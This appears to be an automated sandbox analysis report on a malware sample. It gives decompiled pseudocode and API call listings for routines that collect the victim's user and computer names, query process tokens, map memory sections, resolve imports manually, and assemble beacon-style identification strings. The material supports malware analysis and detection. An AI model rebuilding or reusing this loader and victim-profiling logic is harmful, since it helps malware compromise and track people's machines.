            0x047e3c3d
            0x047e3c44
            0x047e3c44
            0x047e3c4f
            0x047e3c4f
            0x047e3c27
            0x047e3c15
            0x047e3c66
            0x047e3c6c
            0x047e3c76
            0x047e3c78
            0x047e3c7d
            0x047e3c8c
            0x047e3c90
            0x047e3c9b
            0x047e3ca2
            0x047e3ca9
            0x047e3ca9
            0x047e3cb5
            0x047e3cb5
            0x047e3c90
            0x047e3cc0
            0x047e3cc2
            0x047e3cc5
            0x047e3cc7
            0x047e3cca
            0x047e3ccd
            0x047e3cd7
            0x047e3cdb
            0x047e3cdf

            APIs
            • GetUserNameW.ADVAPI32(00000000,?), ref: 047E3C0A
            • RtlAllocateHeap.NTDLL(00000000,?), ref: 047E3C21
            • GetUserNameW.ADVAPI32(00000000,?), ref: 047E3C2E
            • HeapFree.KERNEL32(00000000,00000000), ref: 047E3C4F
            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 047E3C76
            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 047E3C8A
            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 047E3C97
            • HeapFree.KERNEL32(00000000,00000000), ref: 047E3CB5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: HeapName$AllocateComputerFreeUser
            • String ID: Uet
            • API String ID: 3239747167-2766386878
            • Opcode ID: 54d54c34bb629916fe833c15dcf24cc2b55ccfa3f294ad05b3c9954166dd8f96
            • Instruction ID: 789a1d6462c3b0267a13a5d9e76fbb5e5f932ce2ecc422b881def30bd11c2175
            • Opcode Fuzzy Hash: 54d54c34bb629916fe833c15dcf24cc2b55ccfa3f294ad05b3c9954166dd8f96
            • Instruction Fuzzy Hash: F6312AB2A00205EFD710DFAACD81ABAB7F9EB8C700F518629E905D7250E734EE149B10
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 38%
            			E047E421F(char _a4, void* _a8) {
            				void* _v8;
            				void* _v12;
            				char _v16;
            				void* _v20;
            				char _v24;
            				char _v28;
            				char _v32;
            				char _v36;
            				char _v40;
            				void* _v44;
            				void** _t33;
            				void* _t40;
            				void* _t43;
            				void** _t44;
            				intOrPtr* _t47;
            				char _t48;
            
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v20 = _a4;
            				_t48 = 0;
            				_v16 = 0;
            				_a4 = 0;
            				_v44 = 0x18;
            				_v40 = 0;
            				_v32 = 0;
            				_v36 = 0;
            				_v28 = 0;
            				_v24 = 0;
            				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
            					_t33 =  &_v8;
            					__imp__(_v12, 8, _t33);
            					if(_t33 >= 0) {
            						_t47 = __imp__;
            						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
            						_t44 = E047E33DC(_a4);
            						if(_t44 != 0) {
            							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
            							if(_t40 >= 0) {
            								memcpy(_a8,  *_t44, 0x1c);
            								_t48 = 1;
            							}
            							E047E61DA(_t44);
            						}
            						NtClose(_v8); // executed
            					}
            					NtClose(_v12);
            				}
            				return _t48;
            			}



















            0x047e422c
            0x047e422d
            0x047e422e
            0x047e422f
            0x047e4230
            0x047e4234
            0x047e423b
            0x047e424a
            0x047e424d
            0x047e4250
            0x047e4257
            0x047e425a
            0x047e425d
            0x047e4260
            0x047e4263
            0x047e426e
            0x047e4270
            0x047e4279
            0x047e4281
            0x047e4283
            0x047e4295
            0x047e429f
            0x047e42a3
            0x047e42b2
            0x047e42b6
            0x047e42bf
            0x047e42c7
            0x047e42c7
            0x047e42c9
            0x047e42c9
            0x047e42d1
            0x047e42d7
            0x047e42db
            0x047e42db
            0x047e42e6

            APIs
            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 047E4266
            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 047E4279
            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 047E4295
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 047E42B2
            • memcpy.NTDLL(?,00000000,0000001C), ref: 047E42BF
            • NtClose.NTDLL(?), ref: 047E42D1
            • NtClose.NTDLL(00000000), ref: 047E42DB
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
            • String ID:
            • API String ID: 2575439697-0
            • Opcode ID: 2a75af634d72ed9e539de7d56440f082198720d19d4f68538855bde46e86ff21
            • Instruction ID: 5f743865a2791a5221a80d3d2bae757f6c271c83dd55d47715f9e88c32974944
            • Opcode Fuzzy Hash: 2a75af634d72ed9e539de7d56440f082198720d19d4f68538855bde46e86ff21
            • Instruction Fuzzy Hash: 012107B290011DBBDF119F96CD84AEEBFBDEB08750F108222FA05E6210D7759B549BA0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 287 4015b0-401607 GetSystemTimeAsFileTime 290 401609 287->290 291 40160e-401627 CreateFileMappingW 287->291 290->291 292 401671-401677 GetLastError 291->292 293 401629-401632 291->293 296 401679-40167f 292->296 294 401642-401650 MapViewOfFile 293->294 295 401634-40163b GetLastError 293->295 298 401660-401666 GetLastError 294->298 299 401652-40165e 294->299 295->294 297 40163d-401640 295->297 300 401668-40166f CloseHandle 297->300 298->296 298->300 299->296 300->296
            C-Code - Quality: 69%
            			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
            				intOrPtr _v12;
            				struct _FILETIME* _v16;
            				short _v60;
            				struct _FILETIME* _t14;
            				intOrPtr _t15;
            				long _t18;
            				void* _t19;
            				void* _t22;
            				intOrPtr _t31;
            				long _t32;
            				void* _t34;
            
            				_t31 = __edx;
            				_t14 =  &_v16;
            				GetSystemTimeAsFileTime(_t14);
            				_push(0x192);
            				_push(0x54d38000);
            				_push(_v12);
            				_push(_v16);
            				L00402026();
            				_push(_t14);
            				_v16 = _t14;
            				_t15 =  *0x404184;
            				_push(_t15 + 0x4051ca);
            				_push(_t15 + 0x4051c0);
            				_push(0x16);
            				_push( &_v60);
            				_v12 = _t31;
            				L00402020();
            				_t18 = _a4;
            				if(_t18 == 0) {
            					_t18 = 0x1000;
            				}
            				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
            				_t34 = _t19;
            				if(_t34 == 0) {
            					_t32 = GetLastError();
            				} else {
            					if(_a4 != 0 || GetLastError() == 0xb7) {
            						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
            						if(_t22 == 0) {
            							_t32 = GetLastError();
            							if(_t32 != 0) {
            								goto L9;
            							}
            						} else {
            							 *_a8 = _t34;
            							 *_a12 = _t22;
            							_t32 = 0;
            						}
            					} else {
            						_t32 = 2;
            						L9:
            						CloseHandle(_t34);
            					}
            				}
            				return _t32;
            			}














            0x004015b0
            0x004015b9
            0x004015bd
            0x004015c3
            0x004015c8
            0x004015cd
            0x004015d0
            0x004015d3
            0x004015d8
            0x004015d9
            0x004015dc
            0x004015e7
            0x004015ee
            0x004015f2
            0x004015f4
            0x004015f5
            0x004015f8
            0x004015fd
            0x00401607
            0x00401609
            0x00401609
            0x0040161d
            0x00401623
            0x00401627
            0x00401677
            0x00401629
            0x00401632
            0x00401648
            0x00401650
            0x00401662
            0x00401666
            0x00000000
            0x00000000
            0x00401652
            0x00401655
            0x0040165a
            0x0040165c
            0x0040165c
            0x0040163d
            0x0040163f
            0x00401668
            0x00401669
            0x00401669
            0x00401632
            0x0040167f

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
            • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401648
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
            • String ID:
            • API String ID: 3812556954-0
            • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
            • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 72%
            			E0040110B(intOrPtr* __eax, void** _a4) {
            				int _v12;
            				void* _v16;
            				void* _v20;
            				void* _v24;
            				int _v28;
            				int _v32;
            				intOrPtr _v36;
            				int _v40;
            				int _v44;
            				void* _v48;
            				void* __esi;
            				long _t34;
            				void* _t39;
            				void* _t47;
            				intOrPtr* _t48;
            
            				_t48 = __eax;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v24 =  *((intOrPtr*)(__eax + 4));
            				_v16 = 0;
            				_v12 = 0;
            				_v48 = 0x18;
            				_v44 = 0;
            				_v36 = 0x40;
            				_v40 = 0;
            				_v32 = 0;
            				_v28 = 0;
            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
            				if(_t34 < 0) {
            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
            				} else {
            					 *_t48 = _v16;
            					_t39 = E00401459(_t48,  &_v12); // executed
            					_t47 = _t39;
            					if(_t47 != 0) {
            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
            					} else {
            						memset(_v12, 0, _v24);
            						 *_a4 = _v12;
            					}
            				}
            				return _t47;
            			}


















            0x00401114
            0x0040111b
            0x0040111c
            0x0040111d
            0x0040111e
            0x0040111f
            0x00401130
            0x00401134
            0x00401148
            0x0040114b
            0x0040114e
            0x00401155
            0x00401158
            0x0040115f
            0x00401162
            0x00401165
            0x00401168
            0x0040116d
            0x004011a8
            0x0040116f
            0x00401172
            0x00401178
            0x0040117d
            0x00401181
            0x0040119f
            0x00401183
            0x0040118a
            0x00401198
            0x00401198
            0x00401181
            0x004011b0

            APIs
            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74654EE0,00000000,00000000,?), ref: 00401168
              • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
            • memset.NTDLL ref: 0040118A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: Section$CreateViewmemset
            • String ID: @
            • API String ID: 2533685722-2766056989
            • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
            • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
            • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
            • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401000(void* __edi, intOrPtr _a4) {
            				signed int _v8;
            				intOrPtr* _v12;
            				_Unknown_base(*)()** _v16;
            				signed int _v20;
            				signed short _v24;
            				struct HINSTANCE__* _v28;
            				intOrPtr _t43;
            				intOrPtr* _t45;
            				intOrPtr _t46;
            				struct HINSTANCE__* _t47;
            				intOrPtr* _t49;
            				intOrPtr _t50;
            				signed short _t51;
            				_Unknown_base(*)()* _t53;
            				CHAR* _t54;
            				_Unknown_base(*)()* _t55;
            				void* _t58;
            				signed int _t59;
            				_Unknown_base(*)()* _t60;
            				intOrPtr _t61;
            				intOrPtr _t65;
            				signed int _t68;
            				void* _t69;
            				CHAR* _t71;
            				signed short* _t73;
            
            				_t69 = __edi;
            				_v20 = _v20 & 0x00000000;
            				_t59 =  *0x404180;
            				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
            				if(_t43 != 0) {
            					_t45 = _t43 + __edi;
            					_v12 = _t45;
            					_t46 =  *((intOrPtr*)(_t45 + 0xc));
            					if(_t46 != 0) {
            						while(1) {
            							_t71 = _t46 + _t69;
            							_t47 = LoadLibraryA(_t71); // executed
            							_v28 = _t47;
            							if(_t47 == 0) {
            								break;
            							}
            							_v24 = _v24 & 0x00000000;
            							 *_t71 = _t59 - 0x43175ac3;
            							_t49 = _v12;
            							_t61 =  *((intOrPtr*)(_t49 + 0x10));
            							_t50 =  *_t49;
            							if(_t50 != 0) {
            								L6:
            								_t73 = _t50 + _t69;
            								_v16 = _t61 + _t69;
            								while(1) {
            									_t51 =  *_t73;
            									if(_t51 == 0) {
            										break;
            									}
            									if(__eflags < 0) {
            										__eflags = _t51 - _t69;
            										if(_t51 < _t69) {
            											L12:
            											_t21 =  &_v8;
            											 *_t21 = _v8 & 0x00000000;
            											__eflags =  *_t21;
            											_v24 =  *_t73 & 0x0000ffff;
            										} else {
            											_t65 = _a4;
            											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
            											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
            												goto L12;
            											} else {
            												goto L11;
            											}
            										}
            									} else {
            										_t51 = _t51 + _t69;
            										L11:
            										_v8 = _t51;
            									}
            									_t53 = _v8;
            									__eflags = _t53;
            									if(_t53 == 0) {
            										_t54 = _v24 & 0x0000ffff;
            									} else {
            										_t54 = _t53 + 2;
            									}
            									_t55 = GetProcAddress(_v28, _t54);
            									__eflags = _t55;
            									if(__eflags == 0) {
            										_v20 = _t59 - 0x43175a44;
            									} else {
            										_t68 = _v8;
            										__eflags = _t68;
            										if(_t68 != 0) {
            											 *_t68 = _t59 - 0x43175ac3;
            										}
            										 *_v16 = _t55;
            										_t58 = _t59 * 4 - 0xc5d6b08;
            										_t73 = _t73 + _t58;
            										_t32 =  &_v16;
            										 *_t32 = _v16 + _t58;
            										__eflags =  *_t32;
            										continue;
            									}
            									goto L23;
            								}
            							} else {
            								_t50 = _t61;
            								if(_t61 != 0) {
            									goto L6;
            								}
            							}
            							L23:
            							_v12 = _v12 + 0x14;
            							_t46 =  *((intOrPtr*)(_v12 + 0xc));
            							if(_t46 != 0) {
            								continue;
            							} else {
            							}
            							L26:
            							goto L27;
            						}
            						_t60 = _t59 + 0xbce8a5bb;
            						__eflags = _t60;
            						_v20 = _t60;
            						goto L26;
            					}
            				}
            				L27:
            				return _v20;
            			}




























            0x00401000
            0x00401009
            0x0040100e
            0x00401014
            0x0040101d
            0x00401023
            0x00401025
            0x00401028
            0x0040102d
            0x00401034
            0x00401034
            0x00401038
            0x0040103e
            0x00401043
            0x00000000
            0x00000000
            0x00401049
            0x00401053
            0x00401055
            0x00401058
            0x0040105b
            0x0040105f
            0x00401067
            0x00401069
            0x0040106c
            0x004010d4
            0x004010d4
            0x004010d8
            0x00000000
            0x00000000
            0x00401071
            0x00401077
            0x00401079
            0x0040108c
            0x0040108f
            0x0040108f
            0x0040108f
            0x00401093
            0x0040107b
            0x0040107b
            0x00401083
            0x00401085
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00401085
            0x00401073
            0x00401073
            0x00401087
            0x00401087
            0x00401087
            0x00401096
            0x00401099
            0x0040109b
            0x004010a2
            0x0040109d
            0x0040109d
            0x0040109d
            0x004010aa
            0x004010b0
            0x004010b2
            0x004010e2
            0x004010b4
            0x004010b4
            0x004010b7
            0x004010b9
            0x004010c1
            0x004010c1
            0x004010c6
            0x004010c8
            0x004010cf
            0x004010d1
            0x004010d1
            0x004010d1
            0x00000000
            0x004010d1
            0x00000000
            0x004010b2
            0x00401061
            0x00401061
            0x00401065
            0x00000000
            0x00000000
            0x00401065
            0x004010e5
            0x004010e5
            0x004010ec
            0x004010f1
            0x00000000
            0x00000000
            0x004010f7
            0x00401102
            0x00000000
            0x00401102
            0x004010f9
            0x004010f9
            0x004010ff
            0x00000000
            0x004010ff
            0x0040102d
            0x00401103
            0x00401108

            APIs
            • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
            • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID:
            • API String ID: 2574300362-0
            • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
            • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
            • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
            • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E00401459(void** __esi, PVOID* _a4) {
            				long _v8;
            				void* _v12;
            				void* _v16;
            				long _t13;
            
            				_v16 = 0;
            				asm("stosd");
            				_v8 = 0;
            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
            				if(_t13 < 0) {
            					_push(_t13);
            					return __esi[6]();
            				}
            				return 0;
            			}







            0x0040146b
            0x00401471
            0x0040147f
            0x00401486
            0x0040148b
            0x00401491
            0x00000000
            0x00401492
            0x00000000

            APIs
            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
            • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
            • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 69%
            			E047E3CE0(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
            				intOrPtr _v4;
            				intOrPtr _v8;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				void* _v48;
            				intOrPtr _v56;
            				void* __edi;
            				intOrPtr _t30;
            				intOrPtr _t33;
            				intOrPtr _t34;
            				intOrPtr _t35;
            				intOrPtr _t36;
            				intOrPtr _t37;
            				void* _t40;
            				intOrPtr _t41;
            				int _t44;
            				intOrPtr _t45;
            				int _t48;
            				void* _t49;
            				intOrPtr _t53;
            				intOrPtr _t59;
            				intOrPtr _t63;
            				intOrPtr* _t65;
            				void* _t66;
            				intOrPtr _t71;
            				intOrPtr _t77;
            				intOrPtr _t80;
            				intOrPtr _t83;
            				int _t86;
            				intOrPtr _t88;
            				int _t91;
            				intOrPtr _t93;
            				int _t96;
            				void* _t98;
            				void* _t99;
            				void* _t103;
            				void* _t105;
            				void* _t106;
            				intOrPtr _t107;
            				long _t109;
            				intOrPtr* _t110;
            				intOrPtr* _t111;
            				long _t112;
            				int _t113;
            				void* _t114;
            				void* _t115;
            				void* _t116;
            				void* _t119;
            				void* _t120;
            				void* _t122;
            				void* _t123;
            
            				_t103 = __edx;
            				_t99 = __ecx;
            				_t120 =  &_v16;
            				_t112 = __eax;
            				_t30 =  *0x47ea3e0; // 0x5429c08
            				_v4 = _t30;
            				_v8 = 8;
            				_t98 = RtlAllocateHeap( *0x47ea2d8, 0, 0x800);
            				if(_t98 != 0) {
            					if(_t112 == 0) {
            						_t112 = GetTickCount();
            					}
            					_t33 =  *0x47ea018; // 0x9e6833dc
            					asm("bswap eax");
            					_t34 =  *0x47ea014; // 0x3a87c8cd
            					asm("bswap eax");
            					_t35 =  *0x47ea010; // 0xd8d2f808
            					asm("bswap eax");
            					_t36 =  *0x47ea00c; // 0x13d015ef
            					asm("bswap eax");
            					_t37 =  *0x47ea348; // 0xc3d5a8
            					_t3 = _t37 + 0x47eb5ac; // 0x74666f73
            					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18f, _t36, _t35, _t34, _t33,  *0x47ea02c,  *0x47ea004, _t112);
            					_t40 = E047E467F();
            					_t41 =  *0x47ea348; // 0xc3d5a8
            					_t4 = _t41 + 0x47eb575; // 0x74707526
            					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
            					_t122 = _t120 + 0x38;
            					_t114 = _t113 + _t44;
            					if(_a12 != 0) {
            						_t93 =  *0x47ea348; // 0xc3d5a8
            						_t8 = _t93 + 0x47eb508; // 0x732526
            						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
            						_t122 = _t122 + 0xc;
            						_t114 = _t114 + _t96;
            					}
            					_t45 =  *0x47ea348; // 0xc3d5a8
            					_t10 = _t45 + 0x47eb246; // 0x74636126
            					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
            					_t123 = _t122 + 0xc;
            					_t115 = _t114 + _t48; // executed
            					_t49 = E047E472F(_t99); // executed
            					_t105 = _t49;
            					if(_t105 != 0) {
            						_t88 =  *0x47ea348; // 0xc3d5a8
            						_t12 = _t88 + 0x47eb8d0; // 0x736e6426
            						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
            						_t123 = _t123 + 0xc;
            						_t115 = _t115 + _t91;
            						HeapFree( *0x47ea2d8, 0, _t105);
            					}
            					_t106 = E047E1340();
            					if(_t106 != 0) {
            						_t83 =  *0x47ea348; // 0xc3d5a8
            						_t14 = _t83 + 0x47eb8c5; // 0x6f687726
            						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
            						_t123 = _t123 + 0xc;
            						_t115 = _t115 + _t86;
            						HeapFree( *0x47ea2d8, 0, _t106);
            					}
            					_t107 =  *0x47ea3cc; // 0x5429600
            					_a20 = E047E6B59(0x47ea00a, _t107 + 4);
            					_t53 =  *0x47ea36c; // 0x54295b0
            					_t109 = 0;
            					if(_t53 != 0) {
            						_t80 =  *0x47ea348; // 0xc3d5a8
            						_t17 = _t80 + 0x47eb8be; // 0x3d736f26
            						wsprintfA(_t115 + _t98, _t17, _t53);
            					}
            					if(_a20 != _t109) {
            						_t116 = RtlAllocateHeap( *0x47ea2d8, _t109, 0x800);
            						if(_t116 != _t109) {
            							E047E2915(GetTickCount());
            							_t59 =  *0x47ea3cc; // 0x5429600
            							__imp__(_t59 + 0x40);
            							asm("lock xadd [eax], ecx");
            							_t63 =  *0x47ea3cc; // 0x5429600
            							__imp__(_t63 + 0x40);
            							_t65 =  *0x47ea3cc; // 0x5429600
            							_t66 = E047E6675(1, _t103, _t98,  *_t65); // executed
            							_t119 = _t66;
            							asm("lock xadd [eax], ecx");
            							if(_t119 != _t109) {
            								StrTrimA(_t119, 0x47e9280);
            								_push(_t119);
            								_t71 = E047E7563();
            								_v20 = _t71;
            								if(_t71 != _t109) {
            									_t110 = __imp__;
            									 *_t110(_t119, _v8);
            									 *_t110(_t116, _v8);
            									_t111 = __imp__;
            									 *_t111(_t116, _v32);
            									 *_t111(_t116, _t119);
            									_t77 = E047E21A6(0xffffffffffffffff, _t116, _v28, _v24); // executed
            									_v56 = _t77;
            									if(_t77 != 0 && _t77 != 0x10d2) {
            										E047E63F6();
            									}
            									HeapFree( *0x47ea2d8, 0, _v48);
            									_t109 = 0;
            								}
            								HeapFree( *0x47ea2d8, _t109, _t119);
            							}
            							RtlFreeHeap( *0x47ea2d8, _t109, _t116); // executed
            						}
            						HeapFree( *0x47ea2d8, _t109, _a12);
            					}
            					RtlFreeHeap( *0x47ea2d8, _t109, _t98); // executed
            				}
            				return _v16;
            			}

























































            0x047e3ce0
            0x047e3ce0
            0x047e3ce0
            0x047e3cf5
            0x047e3cf7
            0x047e3cfc
            0x047e3d00
            0x047e3d0e
            0x047e3d12
            0x047e3d1a
            0x047e3d22
            0x047e3d22
            0x047e3d24
            0x047e3d30
            0x047e3d3f
            0x047e3d44
            0x047e3d47
            0x047e3d4c
            0x047e3d4f
            0x047e3d54
            0x047e3d57
            0x047e3d63
            0x047e3d70
            0x047e3d72
            0x047e3d78
            0x047e3d7d
            0x047e3d88
            0x047e3d8a
            0x047e3d8d
            0x047e3d93
            0x047e3d95
            0x047e3d9e
            0x047e3da9
            0x047e3dab
            0x047e3dae
            0x047e3dae
            0x047e3db0
            0x047e3db5
            0x047e3dc1
            0x047e3dc3
            0x047e3dc6
            0x047e3dc8
            0x047e3dcd
            0x047e3dd1
            0x047e3dd3
            0x047e3dd8
            0x047e3de4
            0x047e3de6
            0x047e3df2
            0x047e3df4
            0x047e3df4
            0x047e3dff
            0x047e3e03
            0x047e3e05
            0x047e3e0a
            0x047e3e16
            0x047e3e18
            0x047e3e24
            0x047e3e26
            0x047e3e26
            0x047e3e2c
            0x047e3e3f
            0x047e3e43
            0x047e3e48
            0x047e3e4c
            0x047e3e4f
            0x047e3e54
            0x047e3e5e
            0x047e3e60
            0x047e3e67
            0x047e3e7f
            0x047e3e83
            0x047e3e8f
            0x047e3e94
            0x047e3e9d
            0x047e3eae
            0x047e3eb2
            0x047e3ebb
            0x047e3ec1
            0x047e3ec9
            0x047e3ece
            0x047e3edb
            0x047e3ee1
            0x047e3eed
            0x047e3ef3
            0x047e3ef4
            0x047e3ef9
            0x047e3eff
            0x047e3f05
            0x047e3f0c
            0x047e3f13
            0x047e3f19
            0x047e3f20
            0x047e3f24
            0x047e3f2f
